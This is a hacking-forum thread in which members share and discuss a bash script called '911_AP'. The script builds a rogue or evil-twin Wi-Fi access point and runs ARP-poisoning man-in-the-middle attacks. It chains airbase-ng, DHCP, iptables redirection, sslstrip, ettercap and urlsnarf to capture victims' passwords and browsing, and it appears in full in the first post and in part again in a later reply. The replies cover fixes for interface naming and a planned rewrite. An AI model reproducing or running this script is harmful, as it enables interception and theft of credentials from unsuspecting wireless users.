June 24, 2017, 03:31:08 AM
Welcome, Guest. Please login or register.

Support THS!! Buy a t-shirt at the top-hat-sec store! http://www.top-hat-sec.com/store/p23/T-Shirts.html

Author Topic: em3rgency 911_AP Script  (Read 2560 times)

satix

  • Guest
em3rgency 911_AP Script
« on: May 28, 2015, 12:17:26 PM »
I have made a few canges to the script, would like to get the support and feedback to really get this tweaked  using isc-dhcp-server, and working solid on Kali. I feel a very solid FakeAP Script would be useful for many of us

Looking forward to the collaboration on it, Credit to em3rgency & N1t0g3n for what's here

Code: [Select]
#!/bin/bash
# updated mar 4th 2015
# script coded by em3rgency
# script updated by crypiehef to work with Kali Linux
# 911_AP version 1.1 (kali)
# xwininfo -id $(xprop -root | awk '/_NET_ACTIVE_WINDOW\(WINDOW\)/{print $NF}')
# This script creates a FAKE Access Points and loads the tools to enumerate connected clients. And it actually works!
# Also includes workin ARP poisoning features.
# Tested and working on kali Linux, Needs to have version 1.3 of dhcp3-server to work correctly
# Works with ISC DHCP Server now. Readme needs to be updated with ISC config instructions.

#DEFINED COLOR SETTINGS
RED=$(tput setaf 1 && tput bold)
GREEN=$(tput setaf 2 && tput bold)
STAND=$(tput sgr0)
BLUE=$(tput setaf 6 && tput bold)

echo ""
echo ""
echo ""
echo $RED"              +############################################+"
echo $RED"              +    em3rgency's Fake AP SSL MITM script     +"
echo $RED"              +                                            +"
echo $RED"              +                Version 1.1                 +"
echo $RED"              +                                            +"
echo $RED"              +           www.em3rgency.com                +"
echo $RED"              +############################################+"
echo ""
echo $BLUE"     Visit http://www.em3rgency.com for updates to this script. Thanks"
echo ""
echo ""
sleep 3
clear

echo $BLUE"                    em3rgency's MITM script Version 1.1 !"
echo
echo $RED"              ************************************************";
echo $RED"              *    1.  Prerequsites and Updates              *";
echo $RED"              *    2.  Run FAKE AP Static                    *";
echo $RED"              *    3.  Run EVIL TWIN AP                      *";
echo $RED"              *    4.  Run Standard ARP poison               *";
echo $RED"              *    5.  Netdiscover connected clients         *";
echo $RED"              *    6.  EXIT                                  *";
echo $RED"              ************************************************";
echo ""

echo $BLUE"                          Select Menu Option:"
read menuoption
if [ $menuoption = "1" ]; then
clear
echo ""
echo $RED"                   **************************************";
echo $RED"                   *    1.  Run apt-get update          *";
echo $RED"                   *    2.  Run apt-get upgrade         *";
echo $RED"                   *    3.  Distribution upgrade        *";
echo $RED"                   *    4.  Edit etter.conf             *";
echo $RED"                   *    5.  Edit DHCP tunnel interface  *";
echo $RED"                   *    6.  Install Dhcp3-server        *";
echo $RED"                   *    7.  Update aircrack-ng          *";
echo $RED"                   *    8.  Return to Main Menu         *";
echo $RED"                   **************************************";

echo $BLUE"                           Select Menu Option:"$STAND
read menuoption
if [ $menuoption = "1" ]; then

#This command will look for any upgrades to your OS distro.
sudo apt-get update
clear
./911_AP.sh
else

#This command will look for any upgrades to your OS distro.
if [ $menuoption = "2" ]; then
sudo apt-get upgrade
clear
./911_AP.sh
else

#This command will look for any distribution upgrades to your OS distro.
if [ $menuoption = "3" ]; then
sudo apt-get dist-upgrade
clear
./911_AP.sh
else

#This command edit etter.conf
if [ $menuoption = "4" ]; then
leafpad /etc/ettercap/etter.conf
clear
./911_AP.sh
else

#This command will edit your tunnel interface
if [ $menuoption = "5" ]; then
nano /etc/default/isc-dhcp-server
clear
./911_AP.sh
else

#This command will Install DHCP3-server on BT5r3
if [ $menuoption = "6" ]; then
apt-get install dhcp3-server
clear
./911_AP.sh
else

#This command will update aircrack-ng to the latest nightly build
if [ $menuoption = "7" ]; then
sudo airodump-ng-oui-update
clear
else
if [ $menuoption = "8" ]; then
./911_AP.sh
fi
fi
fi
fi
fi
fi
fi
fi
else

if [ $menuoption = "2" ]; then
#This command will RUN The STATIC FAKE AP attack
sleep 2

# Configuring your Network interfaces
echo
echo $BLUE"                   [+] Lets get started shall we [+]"
echo $STAND""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo "Enter the gateway IP address, Shown above. Example 192.168.1.1: "
read -e gatewayip
clear
echo -n "Enter your interface that is connected to the internet, Example eth0: "
read -e internet_interface
clear
echo -n "Enter your interface to be used for the fake AP, Example wlan1: "
read -e fakeap_interface
clear
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
clear
echo -n "Name the folder you want to save your logs into "
read -e SESSION
#creates session directory
mkdir -p /root/$SESSION
clear

echo $BLUE"              Starting Airmon-ng and creating mon0 interface...."$STAND
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"
sleep 2
clear

echo $RED"          [##########################################################]"
echo $RED"  [+][+][+]              Running MITM attack vectors                 [+][+][+]"
echo $RED"          [##########################################################]"
sleep 5
echo ""

# Dhcpd directory and dhcpd.conf creation
mkdir -p "/var/run/dhcpd"
echo "authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;

range 10.0.0.30 10.0.0.60;

}" > /var/run/dhcpd/dhcpd.conf

# FAKEAP setup
echo $BLUE"             Configuring and Starting your FAKE Access Point...."
xterm -bg blue -fg white -geometry 100x7+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 3
echo ""

# Setup your IP Tables
echo $BLUE"                     Configuring your IP tables...."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo ""

#  DHCP
echo $BLUE"              Setting up DHCP to work with $ESSID...."
touch /var/run/dhcpd.pid
chown root:root /var/run/dhcpd.pid
xterm -bg blue -fg white -geometry 80x7-0+25 -T DHCP -e dhcpd -d -f -cf "/var/run/dhcpd/dhcpd.conf" at0 & dhcpid=$!
sleep 3
echo ""

# SSLstrip
echo $BLUE"            Starting SSLstrip to enumerate user credentials...."
sudo xterm  -bg blue -fg white -geometry 80x7-0+193 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
echo ""

# Ettercap
echo $BLUE"               Starting Ettercap to sniff client passwords...."
xterm -bg blue -fg white -geometry 80x7-0+366 -T ettercap -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -p -u -T -q -i at0 & ettercapid=$!
sleep 3
echo ""

# URLSnarf
echo $BLUE"          Starting URLSnarf to show the websites the victim browses...."
xterm -bg blue -fg white -geometry 80x7-0+539 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $internet_interface & urlsnarfid=$!
sleep 3
clear

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0-25 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo $RED"    ####################################################################"
echo $RED"    [        em3rgency's Fake AP SSL MITM attack is now running...     ]"
echo $RED"    [                                                                  ]"
echo $RED"    [     Press Y then ENTERKEY to close kill and clean up the script  ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
echo ""
echo ""
read WISH

# Kill all
if [ $WISH = "y" ] ; then
echo
echo $BLUE"                           Cleaning up your mess"$STAND
echo ''
sleep 2

kill ${fakeapid}
kill ${dhcpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${urlsnarfid}
kill ${dritnetid}
kill ${sslstriplogid}

airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
clear
echo ""
echo ""
echo $RED"             [+][+][+]     Everything is now cleaned up    [+][+][+]"
echo $RED"             [+][+][+]Please visit http://www.em3rgency.com[+][+][+]"
echo $RED"             [+][+][+]          Coded by em3rgency         [+][+][+]"
sleep 5
exit

fi

sleep 3
clear

./911_AP.sh
else

# This command will RUN The EVIL TWIN AP attack
if [ $menuoption = "3" ]; then
sleep 3

# Configuring your Network interfaces
echo
echo $BLUE"                       [+] Lets get started shall we [+]"$STAND
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo ""
echo "Enter the gateway IP address, Shown above. Example 192.168.1.1: "
read -e gatewayip
clear
echo -n "Enter your interface that is connected to the internet, Example eth0: "
read -e internet_interface
clear
echo -n "Enter your interface to be used for the fake AP, Example wlan1: "
read -e fakeap_interface
clear
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
clear
echo -n "Name the folder you want to save your logs into "
read -e SESSION
clear
mkdir -p /root/$SESSION
clear

echo $BLUE"               Starting Airmon-ng and creating mon0 interface...."$STAND
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"
sleep 2
clear

echo $RED"          [##########################################################]"
echo $RED"  [+][+][+]              Running MITM attack vectors                 [+][+][+]"
echo $RED"          [##########################################################]"
sleep 5
echo ""

# Dhcpd directory and dhcpd.conf creation
mkdir -p "/var/run/dhcpd"
echo "authoritative;

default-lease-time 700;
max-lease-time 8000;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;

range 10.0.0.30 10.0.0.60;

}" > /var/run/dhcpd/dhcpd.conf

# FAKEAP setup
echo $BLUE"                     Configuring and Starting $ESSID...."
xterm -bg blue -fg white -geometry 100x7+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -P -C 60 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 3
echo ""

# Setup your IP Tables
echo "                          Configuring your IP tables...."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
echo ""

#  DHCP
echo "                   Setting up DHCP to work with EVIL TWIN AP...."
touch /var/run/dhcpd.pid
chown root:root /var/run/dhcpd.pid
xterm -bg blue -fg white -geometry 80x7-0+25 -T DHCP -e dhcpd -d -f -cf "/var/run/dhcpd/dhcpd.conf" at0 & dhcpid=$!
sleep 3
echo ""

# SSLstrip
echo "               Starting SSLstrip to enumerate user credentials...."
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2
echo ""

# Ettercap
echo "                 Starting Ettercap to sniff client passwords...."
xterm -bg blue -fg white -geometry 80x7-0+366 -T ettercap -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -p -u -T -q -i at0 & ettercapid=$!
sleep 3
echo ""

# URLSnarf
echo "            Starting URLSnarf to show the websites the victim browses...."
xterm -bg blue -fg white -geometry 80x7-0+539 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $internet_interface & urlsnarfid=$!
sleep 3
clear

#SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0-25 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo $RED"     ####################################################################"
echo $RED"     [        em3rgency's Fake AP SSL MITM attack is now running...     ]"
echo $RED"     [                                                                  ]"
echo $RED"     [    Press Y then ENTERKEY to close kill and clean up the script   ]"
echo $RED"     [                                                                  ]"
echo $RED"     [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"     ####################################################################"
echo $STAND""
echo ""
read WISH

# Kill all
if [ $WISH = "y" ] ; then
echo
echo $BLUE"                           Cleaning up your mess"
echo ''
sleep 2

kill ${fakeapid}
kill ${dhcpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${urlsnarfid}
kill ${dritnetid}
kill ${sslstriplogid}

airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
clear
echo ""
echo ""
echo $RED"             [+][+][+]     Everything is now cleaned up    [+][+][+]"
echo $RED"             [+][+][+]Please visit http://www.em3rgency.com[+][+][+]"
echo $RED"             [+][+][+]          Coded by em3rgency         [+][+][+]"$STAND
sleep 5

fi

sleep 3
clear
./911_AP.sh
else

# Credits to N1t0g3n for the base to this section. Thanks bro
if [ $menuoption = "4" ]; then
clear
echo ""
echo ""
echo $BLUE"                  Finding wireless and ethernet interfaces."$STAND
sleep 3
echo ""
ifconfig -a | cut -d " " -f1 | sed '/^$/d' | egrep -v 'lo|vm'
echo ""
echo ""
echo "Please type the name of your wireless interface (wlan0): "
read WIFACE
sleep 2
echo ""
echo ""
echo "Please type the name of your ethernet interface (eth0): "
read ETH0
clear
echo -n "Name the folder you want to save your logs into "
read -e SESSION

mkdir -p /root/$SESSION
clear
echo ""
echo ""
clear
echo $RED"              **************************************************";
echo $RED"              *    1.  Attack entire Gateway through LAN       *";
echo $RED"              *    2.  Attack entire Gateway through Wireless  *";
echo $RED"              *    3.  Attack single host through LAN          *";
echo $RED"              *    4.  Attack single host through Wireless     *";
echo $RED"              *    5.  Return to Main Menu                     *";
echo $RED"              **************************************************";
echo $STAND""
echo ""
echo $BLUE"                           Select Menu Option: "
read menuoption
if [ $menuoption = "1" ]; then
echo
echo
echo "                This should be your Gateway from what I see: "
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your Gateway in below: "$STAND
read GATEWAY
echo $BLUE"                         Starting attack on Gateway"
echo ""
echo ""
echo "                   Passwords will show up in ettercap window"
sleep 3
echo "1" > /proc/sys/net/ipv4/ip_forward

#  PORT redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# URLSnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf  -i $ETH0 &
sleep 2

# Ettercap
xterm -bg blue -fg white -geometry 80x7-0+366 -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $ETH0 -M arp:remote /$GATEWAY/ // &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"$STAND
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "2" ]; then
#This will allow you to forward packets from the router
echo $BLUE"              This should be your gateway from what I see: "$STAND
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $BLUE"Please type the IP of your gateway: "$STAND
read GATEWAY
echo $BLUE"                      Starting attack on gateway"
echo ""
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

echo "1" > /proc/sys/net/ipv4/ip_forward

# URLSnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $WIFACE &
sleep 2

# Port redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Etterap
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $WIFACE -M arp:remote /$GATEWAY/ // &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"$STAND
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "3" ]; then
#This will allow you to forward packets from the router
echo ""
echo ""
echo $BLUE"              This should be your gateway from what I see: "
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your gateway: "
read GATEWAY3
echo ""
echo ""
echo "Please type the IP of the target host: "
read HOST3
echo ""
echo $BLUE"                      Starting Attack on Target Host"
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

echo "1" > /proc/sys/net/ipv4/ip_forward

# URLsnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $ETH0 &
sleep 2

# Port redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Ettercap
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -TqM ARP:REMOTE /$GATEWAY3/ /$HOST3/ &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "4" ]; then
echo ""
echo ""
echo $BLUE"This should be your Gateway from what I see: "
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your gateway: "
read GATEWAY4
echo ""
echo "Please type the IP of the target host: "
read HOST4
echo ""
echo $BLUE"                     Starting Attack on Target Host"
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

echo "1" > /proc/sys/net/ipv4/ip_forward

# URLsnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $WIFACE &
sleep 2

# Port redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Ettercap
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $WIFACE -M arp:remote /$GATEWAY4/ /$HOST4/ &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log  -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
clear

echo $RED"                Invalid option, you must choose 1,2,3,4 or 5.."
sleep 2
echo $BLUE"                          Re-Launching Script..."
./911_AP.sh

fi
fi
fi
fi
if [ $menuoption = "5" ]; then
./911_AP.sh
fi
else

# A script to quickly tell whose on your network in real time.
if [ $menuoption = "5" ]; then
clear
echo $BLUE"           This will show all The clients connected to The network"
echo ""
sleep 3
clear
echo
echo
echo $STAND"Please type the name of your network interface Example: eth0 "
read IFACE;
echo ""
echo ""
echo "               This should be your gateway from what I see: "
route -n -A inet | grep UG
sleep 1
echo ""
echo ""
echo $STAND"Please type in the IP address of your gateway"
read GATEWAY;
sleep 2
clear
echo ""
echo ""
echo ""
echo $BLUE"                   Press CTRL C to stop close netdiscover"
echo ""
echo ""
echo $RED"    ####################################################################"
echo $RED"    [           em3rgency's Netdiscover script is now running          ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"

sudo xterm -bg blue -fg white -e netdiscover -i $IFACE -r $GATEWAY/24
read ENTERKEY
clear
./911_AP.sh

else
if [ $menuoption = "6" ]; then
exit
fi
fi
fi
fi
fi
fi

Offline TAPE

  • Top Hat Member Moderator
  • Elite
  • ********
  • Posts: 1247
  • Internets: +192/-0
Re: em3rgency 911_AP Script
« Reply #1 on: May 28, 2015, 02:35:50 PM »
Hey dude,


With the new aircrack, you may want to look at the way the monitor interfaces are called as the interface names are now different in the new aircrack..


So wlan2 will not become mon0, but wlan2mon.


Nonetheless, I would fully support a rewritten fakeAP / easycreds script..




edit
-----
Also think some functions may need to be revisited..;
Code: [Select]
#This command will update aircrack-ng to the latest nightly build
if [ $menuoption = "7" ]; then
sudo airodump-ng-oui-update
This does not update aircrack, but updates the oui list (list of MAC vendors/MACs)
http://standards-oui.ieee.org/oui.txt
« Last Edit: May 28, 2015, 02:44:13 PM by TAPE »
Take all the advice you like and then tell everyone to **** off and do your own thing -- Gitsnik

Offline 0E 800

  • If something can corrupt you, you're corrupted already.
  • Top Hat Member
  • Elite
  • ********
  • Posts: 961
  • Internets: +154/-0
  • • тнε ιηтεяηεт ιs мү яεcүcℓε-вιη •
Re: em3rgency 911_AP Script
« Reply #2 on: May 28, 2015, 02:43:36 PM »
Maybe you bash and python pros can create a simple script that goes something like:

If aircrack = version x.x.x that uses mon0
Then = make script use mon0
If aircrack = version 1x.x.x.x that uses wlan0mon
Then = make script use wlan0mon

Er something like that.. maybe we could just paste that in any script and it will overwrite?
"He who passes not his days in the realm of dreams is the slave of the days."

Offline TAPE

  • Top Hat Member Moderator
  • Elite
  • ********
  • Posts: 1247
  • Internets: +192/-0
Re: em3rgency 911_AP Script
« Reply #3 on: May 28, 2015, 02:53:01 PM »
Well it would be easy to do a
Code: [Select]
'create monitor interface MON_IFACE'
sed "s/mon0/$MON_IFACE/g"


but not sure whether that would solve all.. :)


Some things just need re-writing..
Take all the advice you like and then tell everyone to **** off and do your own thing -- Gitsnik

satix

  • Guest
Re: em3rgency 911_AP Script
« Reply #4 on: May 29, 2015, 08:13:41 AM »
So who would like to work on this and get something really useful for our community?

Offline TAPE

  • Top Hat Member Moderator
  • Elite
  • ********
  • Posts: 1247
  • Internets: +192/-0
Re: em3rgency 911_AP Script
« Reply #5 on: May 29, 2015, 10:44:45 AM »
Well I toyed with the same idea  a few months ago, but got sidetracked by ..well..life :)


It could be interesting to look at a rewrite.


I came accross a python script which may be interesting to look at also, havent tested  it.


http://sign0f4.blogspot.jp/2014/07/introducing-mitmf-framework-for-man-in.html

Take all the advice you like and then tell everyone to **** off and do your own thing -- Gitsnik

Offline GalaxyNinja

  • Global Moderator
  • Elite
  • *****
  • Posts: 1713
  • Internets: +95/-0
  • My password is **********
Re: em3rgency 911_AP Script
« Reply #6 on: May 29, 2015, 11:47:44 AM »
So who would like to work on this and get something really useful for our community?

satix, from the first post it looked like you were working on it and just looking for support and feedback?

satix

  • Guest
Re: em3rgency 911_AP Script
« Reply #7 on: May 29, 2015, 02:14:37 PM »
I was working on it a bit, I will post more updates. Perhaps others can work on it as well and together, we can come up with a "final version" that all can benefit from.


Offline c0ldg0ld

  • Si Vis Pacem, Para Bellum
  • Global Moderator
  • Elite
  • *****
  • Posts: 526
  • Internets: +34/-0
    • Public Key
Re: em3rgency 911_AP Script
« Reply #8 on: June 01, 2015, 10:19:05 AM »
Didn't Crypiehef already re-work this script to bring it "up to date" recently?
rm -rf /bin/laden

Time is an illusion. Lunchtime doubly so.


Public Key

ch3rn0byl

  • Guest
Re: em3rgency 911_AP Script
« Reply #9 on: June 01, 2015, 11:02:57 AM »
Didn't Crypiehef already re-work this script to bring it "up to date" recently?
Yep.

satix

  • Guest
Re: em3rgency 911_AP Script
« Reply #10 on: June 02, 2015, 09:53:23 AM »
Link?

Offline GalaxyNinja

  • Global Moderator
  • Elite
  • *****
  • Posts: 1713
  • Internets: +95/-0
  • My password is **********

Offline cg

  • Top Hat Member
  • Enthusiast
  • ********
  • Posts: 64
  • Internets: +2/-6
Re: em3rgency 911_AP Script
« Reply #12 on: June 02, 2015, 04:39:30 PM »
http://forum.top-hat-sec.com/index.php?topic=5239.msg43237

his website is down. if anyone have the script then please post it here. thanks!

Offline 0E 800

  • If something can corrupt you, you're corrupted already.
  • Top Hat Member
  • Elite
  • ********
  • Posts: 961
  • Internets: +154/-0
  • • тнε ιηтεяηεт ιs мү яεcүcℓε-вιη •
Re: em3rgency 911_AP Script
« Reply #13 on: June 02, 2015, 05:02:00 PM »
https://github.com/crypiehef/911_AP.sh



You wanna know how I found it?

I pasted the link that was no longer available into the google search bar.

Then I accessed the cached link. The cached link had the git-hub address.

Heres another cool trick: I am going to paste the code here too, you know, just in case it goes missing from git-hub  8)

Code: [Select]
#!/bin/bash
# updated mar 4th 2015
# script coded by em3rgency
# script updated by crypiehef to work with Kali Linux
# 911_AP version 1.1 (kali)
# xwininfo -id $(xprop -root | awk '/_NET_ACTIVE_WINDOW\(WINDOW\)/{print $NF}')
# This script creates a FAKE Access Points and loads the tools to enumerate connected clients. And it actually works!
# Also includes workin ARP poisoning features.
# Tested and working on kali Linux, Needs to have version 1.3 of dhcp3-server to work correctly
# Works with ISC DHCP Server now. Readme needs to be updated with ISC config instructions.

#DEFINED COLOR SETTINGS
RED=$(tput setaf 1 && tput bold)
GREEN=$(tput setaf 2 && tput bold)
STAND=$(tput sgr0)
BLUE=$(tput setaf 6 && tput bold)

echo ""
echo ""
echo ""
echo $RED"              +############################################+"
echo $RED"              +    em3rgency's Fake AP SSL MITM script     +"
echo $RED"              +                                            +"
echo $RED"              +                Version 1.1                 +"
echo $RED"              +                                            +"
echo $RED"              +           www.em3rgency.com                +"
echo $RED"              +############################################+"
echo ""
echo $BLUE"     Visit http://www.em3rgency.com for updates to this script. Thanks"
echo ""
echo ""
sleep 3
clear

echo $BLUE"                    em3rgency's MITM script Version 1.1 !"
echo
echo $RED"              ************************************************";
echo $RED"              *    1.  Prerequsites and Updates              *";
echo $RED"              *    2.  Run FAKE AP Static                    *";
echo $RED"              *    3.  Run EVIL TWIN AP                      *";
echo $RED"              *    4.  Run Standard ARP poison               *";
echo $RED"              *    5.  Netdiscover connected clients         *";
echo $RED"              *    6.  EXIT                                  *";
echo $RED"              ************************************************";
echo ""

echo $BLUE"                          Select Menu Option:"
read menuoption
if [ $menuoption = "1" ]; then
clear
echo ""
echo $RED"                   **************************************";
echo $RED"                   *    1.  Run apt-get update          *";
echo $RED"                   *    2.  Run apt-get upgrade         *";
echo $RED"                   *    3.  Distribution upgrade        *";
echo $RED"                   *    4.  Edit etter.conf             *";
echo $RED"                   *    5.  Edit DHCP tunnel interface  *";
